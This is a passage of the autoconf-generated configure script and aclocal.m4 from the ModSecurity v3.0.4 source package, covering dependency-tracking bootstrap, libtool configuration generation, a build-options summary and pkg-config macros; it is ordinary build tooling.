#( *) : ;; esac shift # Used to flag and report bootstrapping failures. am_rc=0 for am_mf do # Strip MF so we end up with the name of the file. am_mf=`$as_echo "$am_mf" | sed -e 's/:.*$//'` # Check whether this is an Automake generated Makefile which includes # dependency-tracking related rules and includes. # Grep'ing the whole file directly is not great: AIX grep has a line # limit of 2048, but all sed's we know have understand at least 4000. sed -n 's,^am--depfiles:.*,X,p' "$am_mf" | grep X >/dev/null 2>&1 \ || continue am_dirpart=`$as_dirname -- "$am_mf" || $as_expr X"$am_mf" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ X"$am_mf" : 'X\(//\)[^/]' \| \ X"$am_mf" : 'X\(//\)$' \| \ X"$am_mf" : 'X\(/\)' \| . 2>/dev/null || $as_echo X"$am_mf" | sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/ q } /^X\(\/\/\)[^/].*/{ s//\1/ q } /^X\(\/\/\)$/{ s//\1/ q } /^X\(\/\).*/{ s//\1/ q } s/.*/./; q'` am_filepart=`$as_basename -- "$am_mf" || $as_expr X/"$am_mf" : '.*/\([^/][^/]*\)/*$' \| \ X"$am_mf" : 'X\(//\)$' \| \ X"$am_mf" : 'X\(/\)' \| . 2>/dev/null || $as_echo X/"$am_mf" | sed '/^.*\/\([^/][^/]*\)\/*$/{ s//\1/ q } /^X\/\(\/\/\)$/{ s//\1/ q } /^X\/\(\/\).*/{ s//\1/ q } s/.*/./; q'` { echo "$as_me:$LINENO: cd "$am_dirpart" \ && sed -e '/# am--include-marker/d' "$am_filepart" \ | $MAKE -f - am--depfiles" >&5 (cd "$am_dirpart" \ && sed -e '/# am--include-marker/d' "$am_filepart" \ | $MAKE -f - am--depfiles) >&5 2>&5 ac_status=$? echo "$as_me:$LINENO: \$? = $ac_status" >&5 (exit $ac_status); } || am_rc=$? done if test $am_rc -ne 0; then { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 $as_echo "$as_me: error: in \`$ac_pwd':" >&2;} as_fn_error $? "Something went wrong bootstrapping makefile fragments for automatic dependency tracking. Try re-running configure with the '--disable-dependency-tracking' option to at least be able to build the package (albeit without support for automatic dependency tracking). See \`config.log' for more details" "$LINENO" 5; } fi { am_dirpart=; unset am_dirpart;} { am_filepart=; unset am_filepart;} { am_mf=; unset am_mf;} { am_rc=; unset am_rc;} rm -f conftest-deps.mk } ;; "libtool":C) # See if we are running on zsh, and set the options that allow our # commands through without removal of \ escapes. if test -n "${ZSH_VERSION+set}"; then setopt NO_GLOB_SUBST fi cfgfile=${ofile}T trap "$RM \"$cfgfile\"; exit 1" 1 2 15 $RM "$cfgfile" cat <<_LT_EOF >> "$cfgfile" #! $SHELL # Generated automatically by $as_me ($PACKAGE) $VERSION # NOTE: Changes made to this file will be lost: look at ltmain.sh. # Provide generalized library-building support services. # Written by Gordon Matzigkeit, 1996 # Copyright (C) 2014 Free Software Foundation, Inc. # This is free software; see the source for copying conditions. There is NO # warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # GNU Libtool is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of of the License, or # (at your option) any later version. # # As a special exception to the GNU General Public License, if you # distribute this file as part of a program or library that is built # using GNU Libtool, you may include this file under the same # distribution terms that you use for the rest of that program. # # GNU Libtool is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see . # The names of the tagged configurations supported by this script. available_tags='CXX ' # Configured defaults for sys_lib_dlsearch_path munging. : \${LT_SYS_LIBRARY_PATH="$configure_time_lt_sys_library_path"} # ### BEGIN LIBTOOL CONFIG # Which release of libtool.m4 was used? macro_version=$macro_version macro_revision=$macro_revision # Whether or not to build shared libraries. build_libtool_libs=$enable_shared # Whether or not to build static libraries. build_old_libs=$enable_static # What type of objects to build. pic_mode=$pic_mode # Whether or not to optimize for fast installation. fast_install=$enable_fast_install # Shared archive member basename,for filename based shared library versioning on AIX. shared_archive_member_spec=$shared_archive_member_spec # Shell to use when invoking shell scripts. SHELL=$lt_SHELL # An echo program that protects backslashes. ECHO=$lt_ECHO # The PATH separator for the build system. PATH_SEPARATOR=$lt_PATH_SEPARATOR # The host system. host_alias=$host_alias host=$host host_os=$host_os # The build system. build_alias=$build_alias build=$build build_os=$build_os # A sed program that does not truncate output. SED=$lt_SED # Sed that helps us avoid accidentally triggering echo(1) options like -n. Xsed="\$SED -e 1s/^X//" # A grep program that handles long lines. GREP=$lt_GREP # An ERE matcher. EGREP=$lt_EGREP # A literal string matcher. FGREP=$lt_FGREP # A BSD- or MS-compatible name lister. NM=$lt_NM # Whether we need soft or hard links. LN_S=$lt_LN_S # What is the maximum length of a command? max_cmd_len=$max_cmd_len # Object file suffix (normally "o"). objext=$ac_objext # Executable file suffix (normally ""). exeext=$exeext # whether the shell understands "unset". lt_unset=$lt_unset # turn spaces into newlines. SP2NL=$lt_lt_SP2NL # turn newlines into spaces. NL2SP=$lt_lt_NL2SP # convert \$build file names to \$host format. to_host_file_cmd=$lt_cv_to_host_file_cmd # convert \$build files to toolchain format. to_tool_file_cmd=$lt_cv_to_tool_file_cmd # An object symbol dumper. OBJDUMP=$lt_OBJDUMP # Method to check whether dependent libraries are shared objects. deplibs_check_method=$lt_deplibs_check_method # Command to use when deplibs_check_method = "file_magic". file_magic_cmd=$lt_file_magic_cmd # How to find potential files when deplibs_check_method = "file_magic". file_magic_glob=$lt_file_magic_glob # Find potential files using nocaseglob when deplibs_check_method = "file_magic". want_nocaseglob=$lt_want_nocaseglob # DLL creation program. DLLTOOL=$lt_DLLTOOL # Command to associate shared and link libraries. sharedlib_from_linklib_cmd=$lt_sharedlib_from_linklib_cmd # The archiver. AR=$lt_AR # Flags to create an archive (by configure). lt_ar_flags=$lt_ar_flags # Flags to create an archive. AR_FLAGS=\${ARFLAGS-"\$lt_ar_flags"} # How to feed a file listing to the archiver. archiver_list_spec=$lt_archiver_list_spec # A symbol stripping program. STRIP=$lt_STRIP # Commands used to install an old-style archive. RANLIB=$lt_RANLIB old_postinstall_cmds=$lt_old_postinstall_cmds old_postuninstall_cmds=$lt_old_postuninstall_cmds # Whether to use a lock for old archive extraction. lock_old_archive_extraction=$lock_old_archive_extraction # A C compiler. LTCC=$lt_CC # LTCC compiler flags. LTCFLAGS=$lt_CFLAGS # Take the output of nm and produce a listing of raw symbols and C names. global_symbol_pipe=$lt_lt_cv_sys_global_symbol_pipe # Transform the output of nm in a proper C declaration. global_symbol_to_cdecl=$lt_lt_cv_sys_global_symbol_to_cdecl # Transform the output of nm into a list of symbols to manually relocate. global_symbol_to_import=$lt_lt_cv_sys_global_symbol_to_import # Transform the output of nm in a C name address pair. global_symbol_to_c_name_address=$lt_lt_cv_sys_global_symbol_to_c_name_address # Transform the output of nm in a C name address pair when lib prefix is needed. global_symbol_to_c_name_address_lib_prefix=$lt_lt_cv_sys_global_symbol_to_c_name_address_lib_prefix # The name lister interface. nm_interface=$lt_lt_cv_nm_interface # Specify filename containing input files for \$NM. nm_file_list_spec=$lt_nm_file_list_spec # The root where to search for dependent libraries,and where our libraries should be installed. lt_sysroot=$lt_sysroot # Command to truncate a binary pipe. lt_truncate_bin=$lt_lt_cv_truncate_bin # The name of the directory that contains temporary libtool files. objdir=$objdir # Used to examine libraries when file_magic_cmd begins with "file". MAGIC_CMD=$MAGIC_CMD # Must we lock files when doing compilation? need_locks=$lt_need_locks # Manifest tool. MANIFEST_TOOL=$lt_MANIFEST_TOOL # Tool to manipulate archived DWARF debug symbol files on Mac OS X. DSYMUTIL=$lt_DSYMUTIL # Tool to change global to local symbols on Mac OS X. NMEDIT=$lt_NMEDIT # Tool to manipulate fat objects and archives on Mac OS X. LIPO=$lt_LIPO # ldd/readelf like tool for Mach-O binaries on Mac OS X. OTOOL=$lt_OTOOL # ldd/readelf like tool for 64 bit Mach-O binaries on Mac OS X 10.4. OTOOL64=$lt_OTOOL64 # Old archive suffix (normally "a"). libext=$libext # Shared library suffix (normally ".so"). shrext_cmds=$lt_shrext_cmds # The commands to extract the exported symbol list from a shared archive. extract_expsyms_cmds=$lt_extract_expsyms_cmds # Variables whose values should be saved in libtool wrapper scripts and # restored at link time. variables_saved_for_relink=$lt_variables_saved_for_relink # Do we need the "lib" prefix for modules? need_lib_prefix=$need_lib_prefix # Do we need a version for libraries? need_version=$need_version # Library versioning type. version_type=$version_type # Shared library runtime path variable. runpath_var=$runpath_var # Shared library path variable. shlibpath_var=$shlibpath_var # Is shlibpath searched before the hard-coded library search path? shlibpath_overrides_runpath=$shlibpath_overrides_runpath # Format of library name prefix. libname_spec=$lt_libname_spec # List of archive names. First name is the real one, the rest are links. # The last name is the one that the linker finds with -lNAME library_names_spec=$lt_library_names_spec # The coded name of the library, if different from the real name. soname_spec=$lt_soname_spec # Permission mode override for installation of shared libraries. install_override_mode=$lt_install_override_mode # Command to use after installation of a shared archive. postinstall_cmds=$lt_postinstall_cmds # Command to use after uninstallation of a shared archive. postuninstall_cmds=$lt_postuninstall_cmds # Commands used to finish a libtool library installation in a directory. finish_cmds=$lt_finish_cmds # As "finish_cmds", except a single script fragment to be evaled but # not shown. finish_eval=$lt_finish_eval # Whether we should hardcode library paths into libraries. hardcode_into_libs=$hardcode_into_libs # Compile-time system search path for libraries. sys_lib_search_path_spec=$lt_sys_lib_search_path_spec # Detected run-time system search path for libraries. sys_lib_dlsearch_path_spec=$lt_configure_time_dlsearch_path # Explicit LT_SYS_LIBRARY_PATH set during ./configure time. configure_time_lt_sys_library_path=$lt_configure_time_lt_sys_library_path # Whether dlopen is supported. dlopen_support=$enable_dlopen # Whether dlopen of programs is supported. dlopen_self=$enable_dlopen_self # Whether dlopen of statically linked programs is supported. dlopen_self_static=$enable_dlopen_self_static # Commands to strip libraries. old_striplib=$lt_old_striplib striplib=$lt_striplib # The linker used to build libraries. LD=$lt_LD # How to create reloadable object files. reload_flag=$lt_reload_flag reload_cmds=$lt_reload_cmds # Commands used to build an old-style archive. old_archive_cmds=$lt_old_archive_cmds # A language specific compiler. CC=$lt_compiler # Is the compiler the GNU compiler? with_gcc=$GCC # Compiler flag to turn off builtin functions. no_builtin_flag=$lt_lt_prog_compiler_no_builtin_flag # Additional compiler flags for building library objects. pic_flag=$lt_lt_prog_compiler_pic # How to pass a linker flag through the compiler. wl=$lt_lt_prog_compiler_wl # Compiler flag to prevent dynamic linking. link_static_flag=$lt_lt_prog_compiler_static # Does compiler simultaneously support -c and -o options? compiler_c_o=$lt_lt_cv_prog_compiler_c_o # Whether or not to add -lc for building shared libraries. build_libtool_need_lc=$archive_cmds_need_lc # Whether or not to disallow shared libs when runtime libs are static. allow_libtool_libs_with_static_runtimes=$enable_shared_with_static_runtimes # Compiler flag to allow reflexive dlopens. export_dynamic_flag_spec=$lt_export_dynamic_flag_spec # Compiler flag to generate shared objects directly from archives. whole_archive_flag_spec=$lt_whole_archive_flag_spec # Whether the compiler copes with passing no objects directly. compiler_needs_object=$lt_compiler_needs_object # Create an old-style archive from a shared archive. old_archive_from_new_cmds=$lt_old_archive_from_new_cmds # Create a temporary old-style archive to link instead of a shared archive. old_archive_from_expsyms_cmds=$lt_old_archive_from_expsyms_cmds # Commands used to build a shared archive. archive_cmds=$lt_archive_cmds archive_expsym_cmds=$lt_archive_expsym_cmds # Commands used to build a loadable module if different from building # a shared archive. module_cmds=$lt_module_cmds module_expsym_cmds=$lt_module_expsym_cmds # Whether we are building with GNU ld or not. with_gnu_ld=$lt_with_gnu_ld # Flag that allows shared libraries with undefined symbols to be built. allow_undefined_flag=$lt_allow_undefined_flag # Flag that enforces no undefined symbols. no_undefined_flag=$lt_no_undefined_flag # Flag to hardcode \$libdir into a binary during linking. # This must work even if \$libdir does not exist hardcode_libdir_flag_spec=$lt_hardcode_libdir_flag_spec # Whether we need a single "-rpath" flag with a separated argument. hardcode_libdir_separator=$lt_hardcode_libdir_separator # Set to "yes" if using DIR/libNAME\$shared_ext during linking hardcodes # DIR into the resulting binary. hardcode_direct=$hardcode_direct # Set to "yes" if using DIR/libNAME\$shared_ext during linking hardcodes # DIR into the resulting binary and the resulting library dependency is # "absolute",i.e impossible to change by setting \$shlibpath_var if the # library is relocated. hardcode_direct_absolute=$hardcode_direct_absolute # Set to "yes" if using the -LDIR flag during linking hardcodes DIR # into the resulting binary. hardcode_minus_L=$hardcode_minus_L # Set to "yes" if using SHLIBPATH_VAR=DIR during linking hardcodes DIR # into the resulting binary. hardcode_shlibpath_var=$hardcode_shlibpath_var # Set to "yes" if building a shared library automatically hardcodes DIR # into the library and all subsequent libraries and executables linked # against it. hardcode_automatic=$hardcode_automatic # Set to yes if linker adds runtime paths of dependent libraries # to runtime path list. inherit_rpath=$inherit_rpath # Whether libtool must link a program against all its dependency libraries. link_all_deplibs=$link_all_deplibs # Set to "yes" if exported symbols are required. always_export_symbols=$always_export_symbols # The commands to list exported symbols. export_symbols_cmds=$lt_export_symbols_cmds # Symbols that should not be listed in the preloaded symbols. exclude_expsyms=$lt_exclude_expsyms # Symbols that must always be exported. include_expsyms=$lt_include_expsyms # Commands necessary for linking programs (against libraries) with templates. prelink_cmds=$lt_prelink_cmds # Commands necessary for finishing linking programs. postlink_cmds=$lt_postlink_cmds # Specify filename containing input files. file_list_spec=$lt_file_list_spec # How to hardcode a shared library path into an executable. hardcode_action=$hardcode_action # The directories searched by this compiler when creating a shared library. compiler_lib_search_dirs=$lt_compiler_lib_search_dirs # Dependencies to place before and after the objects being linked to # create a shared library. predep_objects=$lt_predep_objects postdep_objects=$lt_postdep_objects predeps=$lt_predeps postdeps=$lt_postdeps # The library search path used internally by the compiler when linking # a shared library. compiler_lib_search_path=$lt_compiler_lib_search_path # ### END LIBTOOL CONFIG _LT_EOF cat <<'_LT_EOF' >> "$cfgfile" # ### BEGIN FUNCTIONS SHARED WITH CONFIGURE # func_munge_path_list VARIABLE PATH # ----------------------------------- # VARIABLE is name of variable containing _space_ separated list of # directories to be munged by the contents of PATH, which is string # having a format: # "DIR[:DIR]:" # string "DIR[ DIR]" will be prepended to VARIABLE # ":DIR[:DIR]" # string "DIR[ DIR]" will be appended to VARIABLE # "DIRP[:DIRP]::[DIRA:]DIRA" # string "DIRP[ DIRP]" will be prepended to VARIABLE and string # "DIRA[ DIRA]" will be appended to VARIABLE # "DIR[:DIR]" # VARIABLE will be replaced by "DIR[ DIR]" func_munge_path_list () { case x$2 in x) ;; *:) eval $1=\"`$ECHO $2 | $SED 's/:/ /g'` \$$1\" ;; x:*) eval $1=\"\$$1 `$ECHO $2 | $SED 's/:/ /g'`\" ;; *::*) eval $1=\"\$$1\ `$ECHO $2 | $SED -e 's/.*:://' -e 's/:/ /g'`\" eval $1=\"`$ECHO $2 | $SED -e 's/::.*//' -e 's/:/ /g'`\ \$$1\" ;; *) eval $1=\"`$ECHO $2 | $SED 's/:/ /g'`\" ;; esac } # Calculate cc_basename. Skip known compiler wrappers and cross-prefix. func_cc_basename () { for cc_temp in $*""; do case $cc_temp in compile | *[\\/]compile | ccache | *[\\/]ccache ) ;; distcc | *[\\/]distcc | purify | *[\\/]purify ) ;; \-*) ;; *) break;; esac done func_cc_basename_result=`$ECHO "$cc_temp" | $SED "s%.*/%%; s%^$host_alias-%%"` } # ### END FUNCTIONS SHARED WITH CONFIGURE _LT_EOF case $host_os in aix3*) cat <<\_LT_EOF >> "$cfgfile" # AIX sometimes has problems with the GCC collect2 program. For some # reason, if we set the COLLECT_NAMES environment variable, the problems # vanish in a puff of smoke. if test set != "${COLLECT_NAMES+set}"; then COLLECT_NAMES= export COLLECT_NAMES fi _LT_EOF ;; esac ltmain=$ac_aux_dir/ltmain.sh # We use sed instead of cat because bash on DJGPP gets confused if # if finds mixed CR/LF and LF-only lines. Since sed operates in # text mode, it properly converts lines to CR/LF. This bash problem # is reportedly fixed, but why not run on old versions too? sed '$q' "$ltmain" >> "$cfgfile" \ || (rm -f "$cfgfile"; exit 1) mv -f "$cfgfile" "$ofile" || (rm -f "$ofile" && cp "$cfgfile" "$ofile" && rm -f "$cfgfile") chmod +x "$ofile" cat <<_LT_EOF >> "$ofile" # ### BEGIN LIBTOOL TAG CONFIG: CXX # The linker used to build libraries. LD=$lt_LD_CXX # How to create reloadable object files. reload_flag=$lt_reload_flag_CXX reload_cmds=$lt_reload_cmds_CXX # Commands used to build an old-style archive. old_archive_cmds=$lt_old_archive_cmds_CXX # A language specific compiler. CC=$lt_compiler_CXX # Is the compiler the GNU compiler? with_gcc=$GCC_CXX # Compiler flag to turn off builtin functions. no_builtin_flag=$lt_lt_prog_compiler_no_builtin_flag_CXX # Additional compiler flags for building library objects. pic_flag=$lt_lt_prog_compiler_pic_CXX # How to pass a linker flag through the compiler. wl=$lt_lt_prog_compiler_wl_CXX # Compiler flag to prevent dynamic linking. link_static_flag=$lt_lt_prog_compiler_static_CXX # Does compiler simultaneously support -c and -o options? compiler_c_o=$lt_lt_cv_prog_compiler_c_o_CXX # Whether or not to add -lc for building shared libraries. build_libtool_need_lc=$archive_cmds_need_lc_CXX # Whether or not to disallow shared libs when runtime libs are static. allow_libtool_libs_with_static_runtimes=$enable_shared_with_static_runtimes_CXX # Compiler flag to allow reflexive dlopens. export_dynamic_flag_spec=$lt_export_dynamic_flag_spec_CXX # Compiler flag to generate shared objects directly from archives. whole_archive_flag_spec=$lt_whole_archive_flag_spec_CXX # Whether the compiler copes with passing no objects directly. compiler_needs_object=$lt_compiler_needs_object_CXX # Create an old-style archive from a shared archive. old_archive_from_new_cmds=$lt_old_archive_from_new_cmds_CXX # Create a temporary old-style archive to link instead of a shared archive. old_archive_from_expsyms_cmds=$lt_old_archive_from_expsyms_cmds_CXX # Commands used to build a shared archive. archive_cmds=$lt_archive_cmds_CXX archive_expsym_cmds=$lt_archive_expsym_cmds_CXX # Commands used to build a loadable module if different from building # a shared archive. module_cmds=$lt_module_cmds_CXX module_expsym_cmds=$lt_module_expsym_cmds_CXX # Whether we are building with GNU ld or not. with_gnu_ld=$lt_with_gnu_ld_CXX # Flag that allows shared libraries with undefined symbols to be built. allow_undefined_flag=$lt_allow_undefined_flag_CXX # Flag that enforces no undefined symbols. no_undefined_flag=$lt_no_undefined_flag_CXX # Flag to hardcode \$libdir into a binary during linking. # This must work even if \$libdir does not exist hardcode_libdir_flag_spec=$lt_hardcode_libdir_flag_spec_CXX # Whether we need a single "-rpath" flag with a separated argument. hardcode_libdir_separator=$lt_hardcode_libdir_separator_CXX # Set to "yes" if using DIR/libNAME\$shared_ext during linking hardcodes # DIR into the resulting binary. hardcode_direct=$hardcode_direct_CXX # Set to "yes" if using DIR/libNAME\$shared_ext during linking hardcodes # DIR into the resulting binary and the resulting library dependency is # "absolute",i.e impossible to change by setting \$shlibpath_var if the # library is relocated. hardcode_direct_absolute=$hardcode_direct_absolute_CXX # Set to "yes" if using the -LDIR flag during linking hardcodes DIR # into the resulting binary. hardcode_minus_L=$hardcode_minus_L_CXX # Set to "yes" if using SHLIBPATH_VAR=DIR during linking hardcodes DIR # into the resulting binary. hardcode_shlibpath_var=$hardcode_shlibpath_var_CXX # Set to "yes" if building a shared library automatically hardcodes DIR # into the library and all subsequent libraries and executables linked # against it. hardcode_automatic=$hardcode_automatic_CXX # Set to yes if linker adds runtime paths of dependent libraries # to runtime path list. inherit_rpath=$inherit_rpath_CXX # Whether libtool must link a program against all its dependency libraries. link_all_deplibs=$link_all_deplibs_CXX # Set to "yes" if exported symbols are required. always_export_symbols=$always_export_symbols_CXX # The commands to list exported symbols. export_symbols_cmds=$lt_export_symbols_cmds_CXX # Symbols that should not be listed in the preloaded symbols. exclude_expsyms=$lt_exclude_expsyms_CXX # Symbols that must always be exported. include_expsyms=$lt_include_expsyms_CXX # Commands necessary for linking programs (against libraries) with templates. prelink_cmds=$lt_prelink_cmds_CXX # Commands necessary for finishing linking programs. postlink_cmds=$lt_postlink_cmds_CXX # Specify filename containing input files. file_list_spec=$lt_file_list_spec_CXX # How to hardcode a shared library path into an executable. hardcode_action=$hardcode_action_CXX # The directories searched by this compiler when creating a shared library. compiler_lib_search_dirs=$lt_compiler_lib_search_dirs_CXX # Dependencies to place before and after the objects being linked to # create a shared library. predep_objects=$lt_predep_objects_CXX postdep_objects=$lt_postdep_objects_CXX predeps=$lt_predeps_CXX postdeps=$lt_postdeps_CXX # The library search path used internally by the compiler when linking # a shared library. compiler_lib_search_path=$lt_compiler_lib_search_path_CXX # ### END LIBTOOL TAG CONFIG: CXX _LT_EOF ;; esac done # for ac_tag as_fn_exit 0 _ACEOF ac_clean_files=$ac_clean_files_save test $ac_write_fail = 0 || as_fn_error $? "write failure creating $CONFIG_STATUS" "$LINENO" 5 # configure is writing to config.log, and then calls config.status. # config.status does its own redirection, appending to config.log. # Unfortunately, on DOS this fails, as config.log is still kept open # by configure, so config.status won't be able to write to it; its # output is simply discarded. So we exec the FD to /dev/null, # effectively closing config.log, so it can be properly (re)opened and # appended to by config.status. When coming back to configure, we # need to make the FD available again. if test "$no_create" != yes; then ac_cs_success=: ac_config_status_args= test "$silent" = yes && ac_config_status_args="$ac_config_status_args --quiet" exec 5>/dev/null $SHELL $CONFIG_STATUS $ac_config_status_args || ac_cs_success=false exec 5>>config.log # Use ||, not &&, to avoid exiting from the if with $? = 1, which # would make configure fail if this is the last instruction. $ac_cs_success || as_fn_exit 1 fi if test -n "$ac_unrecognized_opts" && test "$enable_option_checking" != no; then { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: unrecognized options: $ac_unrecognized_opts" >&5 $as_echo "$as_me: WARNING: unrecognized options: $ac_unrecognized_opts" >&2;} fi # Print a fancy summary echo " " echo " " echo "ModSecurity - ${MSC_GIT_VERSION} for $PLATFORM" echo " " echo " Mandatory dependencies" echo -n " + libInjection ...." echo v3.9.2-30-gbf234eb echo -n " + SecLang tests ...." echo c8cf2c5 echo " " echo " Optional dependencies" ## GeoIP - MaxMind if test "x$GEOIP_FOUND" = "x0" && test "x$MAXMIND_FOUND" = "x0"; then echo " + GeoIP/MaxMind ....not found" fi if test "x$GEOIP_FOUND" = "x1" || test "x$MAXMIND_FOUND" = "x1"; then echo -n " + GeoIP/MaxMind ....found " echo "" if test "x$MAXMIND_FOUND" = "x1"; then echo " * (MaxMind) v${MAXMIND_VERSION}" echo " ${MAXMIND_DISPLAY}" fi if test "x$GEOIP_FOUND" = "x1"; then echo " * (GeoIP) v${GEOIP_VERSION}" echo " ${GEOIP_DISPLAY}" fi fi if test "x$GEOIP_FOUND" = "x2" && test "x$MAXMIND_FOUND" = "x2"; then echo " + GeoIP/MaxMind ....disabled" fi ## LibCurl if test "x$CURL_FOUND" = "x0"; then echo " + LibCURL ....not found" fi if test "x$CURL_FOUND" = "x1"; then echo -n " + LibCURL ....found " if ! test "x$CURL_VERSION" = "x"; then echo "v${CURL_VERSION}" else echo "" fi echo " ${CURL_DISPLAY}" fi if test "x$CURL_FOUND" = "x2"; then echo " + LibCURL ....disabled" fi ## YAJL if test "x$YAJL_FOUND" = "x0"; then echo " + YAJL ....not found" fi if test "x$YAJL_FOUND" = "x1"; then echo -n " + YAJL ....found " if ! test "x$YAJL_VERSION" = "x"; then echo "v${YAJL_VERSION}" else echo "" fi echo " ${YAJL_DISPLAY}" fi if test "x$YAJL_FOUND" = "x2"; then echo " + YAJL ....disabled" fi ## LMDB if test "x$LMDB_FOUND" = "x0"; then echo " + LMDB ....not found" fi if test "x$LMDB_FOUND" = "x1"; then echo -n " + LMDB ....found " if ! test "x$LMDB_VERSION" = "x"; then echo "v${LMDB_VERSION}" else echo "" fi echo " ${LMDB_DISPLAY}" fi if test "x$LMDB_FOUND" = "x2"; then echo " + LMDB ....disabled" fi ## libxml2 if test "x$LIBXML2_FOUND" = "x0"; then echo " + LibXML2 ....not found" fi if test "x$LIBXML2_FOUND" = "x1"; then echo -n " + LibXML2 ....found " if ! test "x$LIBXML2_VERSION" = "x"; then echo "v${LIBXML2_VERSION}" else echo "" fi echo " ${LIBXML2_DISPLAY}" fi if test "x$LIBXML2_FOUND" = "x2"; then echo " + LibXML2 ....disabled" fi ## SSDEEP if test "x$SSDEEP_FOUND" = "x0"; then echo " + SSDEEP ....not found" fi if test "x$SSDEEP_FOUND" = "x1"; then echo -n " + SSDEEP ....found " if ! test "x$SSDEEP_VERSION" = "x"; then echo "v${SSDEEP_VERSION}" else echo "" fi echo " ${SSDEEP_DISPLAY}" fi if test "x$SSDEEP_FOUND" = "x2"; then echo " + SSDEEP ....disabled" fi ## LUA if test "x$LUA_FOUND" = "x0"; then echo " + LUA ....not found" fi if test "x$LUA_FOUND" = "x1"; then echo -n " + LUA ....found " if ! test "x$LUA_VERSION" = "x"; then echo "v${LUA_VERSION}" else echo "" fi echo " ${LUA_DISPLAY}" fi if test "x$LUA_FOUND" = "x2"; then echo " + LUA ....disabled" fi echo " " echo " Other Options" if test $buildTestUtilities = true; then if test $debugLogs = true; then echo " + Test Utilities ....enabled" else echo " + Test Utilities ....partially" fi else echo " + Test Utilities ....disabled" fi if test $debugLogs = true; then echo " + SecDebugLog ....enabled" else echo " + SecDebugLog ....disabled" fi if test "$aflFuzzer" = "true"; then echo " + afl fuzzer ....enabled" echo " ($FUZZ_CPPCFLAGS)" else echo " + afl fuzzer ....disabled" fi if test "$buildExamples" = "true"; then echo " + library examples ....enabled" else echo " + library examples ....disabled" fi if test "$buildParser" = "true"; then echo " + Building parser ....enabled" else echo " + Building parser ....disabled" fi if test "$mutexPm" = "true"; then echo " + Treating pm operations as critical section ....enabled" else echo " + Treating pm operations as critical section ....disabled" fi echo " " if test "$aflFuzzer" = "true"; then echo "WARNING: afl fuzzer was enabled. Make sure you are using the" echo " 'afl-clang-fast' as the compiler, otherwise the compilation" echo " will fail." echo " " echo " You can set the compiler using:" echo " " echo " $ export CXX=afl-clang-fast++ " echo " $ export CC=afl-clang-fast " echo " " fi modsecurity-v3.0.4/aclocal.m40000644000175000017500000016135013607066340016360 0ustar zimmerlezimmerle# generated automatically by aclocal 1.16.1 -*- Autoconf -*- # Copyright (C) 1996-2018 Free Software Foundation, Inc. # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY, to the extent permitted by law; without # even the implied warranty of MERCHANTABILITY or FITNESS FOR A # PARTICULAR PURPOSE. m4_ifndef([AC_CONFIG_MACRO_DIRS], [m4_defun([_AM_CONFIG_MACRO_DIRS], [])m4_defun([AC_CONFIG_MACRO_DIRS], [_AM_CONFIG_MACRO_DIRS($@)])]) m4_ifndef([AC_AUTOCONF_VERSION], [m4_copy([m4_PACKAGE_VERSION], [AC_AUTOCONF_VERSION])])dnl m4_if(m4_defn([AC_AUTOCONF_VERSION]), [2.69],, [m4_warning([this file was generated for autoconf 2.69. You have another version of autoconf. It may work, but is not guaranteed to. If you have problems, you may need to regenerate the build system entirely. To do so, use the procedure documented by the package, typically 'autoreconf'.])]) # pkg.m4 - Macros to locate and utilise pkg-config. -*- Autoconf -*- # serial 11 (pkg-config-0.29.1) dnl Copyright © 2004 Scott James Remnant . dnl Copyright © 2012-2015 Dan Nicholson dnl dnl This program is free software; you can redistribute it and/or modify dnl it under the terms of the GNU General Public License as published by dnl the Free Software Foundation; either version 2 of the License, or dnl (at your option) any later version. dnl dnl This program is distributed in the hope that it will be useful, but dnl WITHOUT ANY WARRANTY; without even the implied warranty of dnl MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU dnl General Public License for more details. dnl dnl You should have received a copy of the GNU General Public License dnl along with this program; if not, write to the Free Software dnl Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA dnl 02111-1307, USA. dnl dnl As a special exception to the GNU General Public License, if you dnl distribute this file as part of a program that contains a dnl configuration script generated by Autoconf, you may include it under dnl the same distribution terms that you use for the rest of that dnl program. dnl PKG_PREREQ(MIN-VERSION) dnl ----------------------- dnl Since: 0.29 dnl dnl Verify that the version of the pkg-config macros are at least dnl MIN-VERSION. Unlike PKG_PROG_PKG_CONFIG, which checks the user's dnl installed version of pkg-config, this checks the developer's version dnl of pkg.m4 when generating configure. dnl dnl To ensure that this macro is defined, also add: dnl m4_ifndef([PKG_PREREQ], dnl [m4_fatal([must install pkg-config 0.29 or later before running autoconf/autogen])]) dnl dnl See the "Since" comment for each macro you use to see what version dnl of the macros you require. m4_defun([PKG_PREREQ], [m4_define([PKG_MACROS_VERSION], [0.29.1]) m4_if(m4_version_compare(PKG_MACROS_VERSION, [$1]), -1, [m4_fatal([pkg.m4 version $1 or higher is required but ]PKG_MACROS_VERSION[ found])]) ])dnl PKG_PREREQ dnl PKG_PROG_PKG_CONFIG([MIN-VERSION]) dnl ---------------------------------- dnl Since: 0.16 dnl dnl Search for the pkg-config tool and set the PKG_CONFIG variable to dnl first found in the path. Checks that the version of pkg-config found dnl is at least MIN-VERSION. If MIN-VERSION is not specified, 0.9.0 is dnl used since that's the first version where most current features of dnl pkg-config existed. AC_DEFUN([PKG_PROG_PKG_CONFIG], [m4_pattern_forbid([^_?PKG_[A-Z_]+$]) m4_pattern_allow([^PKG_CONFIG(_(PATH|LIBDIR|SYSROOT_DIR|ALLOW_SYSTEM_(CFLAGS|LIBS)))?$]) m4_pattern_allow([^PKG_CONFIG_(DISABLE_UNINSTALLED|TOP_BUILD_DIR|DEBUG_SPEW)$]) AC_ARG_VAR([PKG_CONFIG], [path to pkg-config utility]) AC_ARG_VAR([PKG_CONFIG_PATH], [directories to add to pkg-config's search path]) 